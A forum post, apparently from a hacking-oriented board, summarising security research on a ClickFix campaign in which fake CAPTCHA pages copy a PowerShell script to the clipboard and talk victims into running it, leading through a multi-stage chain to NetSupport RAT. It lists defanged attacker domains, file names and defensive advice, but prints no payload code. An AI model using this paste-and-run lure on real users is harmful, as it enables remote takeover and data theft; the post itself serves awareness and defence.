NEWS If You’re Getting Hit with a RAT, Might as Well Be via Clipboard — Smooth, Fast, Flashy

ExcalibuR

ExcalibuR

Legend
LEGEND
PREMIUM
MEMBER
Joined
Jan 17, 2025
Messages
4,031
Reaction score
7,794
Deposit
11,800$
If You’re Getting Hit with a RAT, Might as Well Be via Clipboard — Smooth, Fast, Flashy
1749066732804.png
Just one careless Ctrl+V — and you're already in someone else’s remote panel.


Security researchers from DomainTools have uncovered a new malware campaign using a sleek combination of clipboard poisoning and social engineering to infect victims with NetSupport RAT, a legitimate remote access tool often weaponized by cybercriminals.


🧪 The Attack — Clean UI, Dirty Tricks​


Victims land on spoofed websites impersonating trusted services like Gitcode and DocuSign. These fake pages feature realistic designs and even display a CAPTCHA-style verification popup — but here’s the twist:


While you’re trying to “verify,” a malicious PowerShell script is silently copied to your clipboard.
Click to expand...

Next, users are instructed (via the page or an overlay) to:


  1. Press Win + R to open the Run dialog.
  2. Hit Ctrl + V to paste (unknowingly) the script.
  3. Press Enter.

This method — known as ClickFix — relies on users trusting the process. One click, and you're compromised.



🧬 The Infection Chain​


Once triggered, the script starts a multi-stage download process:


  • Stage 1: Initial PowerShell loader contacts tradingviewtool[.]com.
  • Stage 2: Fetches an executable wbdims.exe from GitHub, set to auto-launch at system startup.
  • Stage 3: This component connects to docusign.sa[.]com, which sends further scripts via crafted URLs.
  • Stage 4: A ZIP archive is downloaded containing jp2launcher.exe, which finally installs NetSupport RAT.

Each PowerShell command passes the baton to the next, forming a layered infection mechanism that's difficult to detect or dissect.



🕵️ Why It Matters​


NetSupport RAT, though originally a legit IT tool, is now a regular in toolkits of groups like:


  • FIN7
  • Scarlet Goldfinch
  • Storm-0408

Once inside, attackers can:


  • Record your screen
  • Exfiltrate sensitive files
  • Execute remote commands
  • Access credentials, documents, and anything else

🔄 Familiar Pattern: FakeUpdates 2.0?​


Researchers note similarities to the SocGholish (FakeUpdates) campaign:


  • Copy-paste payloads
  • Domain structures
  • Social lures
  • Hosted payload chains


🧯 How to Stay Safe​


  • Never run clipboard content blindly.
    If a website tells you to “paste something into Run,” stop immediately.
  • Use script-blocking security tools, especially for PowerShell and CMD.
  • Beware of CAPTCHA fakes — especially when paired with odd system prompts.
  • Block known malicious domains (*.sa[.]com, tradingviewtool[.]com, etc.) at the DNS level.
  • Limit PowerShell permissions or use constrained language mode in enterprise environments.


Bottom line:
In 2025, you don’t need to download an EXE to get infected. Sometimes, just Ctrl+V is enough.
 
You must log in or register to reply here.

Similar threads

WILD
Cold Boot Attack: How I'll Extract Your Encryption Keys From RAM While You're Getting Coffee
Replies
3
Views
208
Mrglitchxxxx
M
pinkman
Interesting Video Tutorial How You're Getting Hacked in 2025
Replies
10
Views
1K
M3TO
M
pinkman
Interesting Video Tutorial How I Found My First Bug (now you can too)
Replies
1
Views
117
dusty_boots
D
pinkman
NEWS Lessons have done, you can also hack the car business. The student created a malicious infrastructure for a couple of euros. And already there are the
Replies
0
Views
82
pinkman
pinkman
pinkman
NEWS $40 billion a year on "I love you" and fake investments. Asian fraudsters have reached a new level
Replies
0
Views
99
pinkman
pinkman
Top Bottom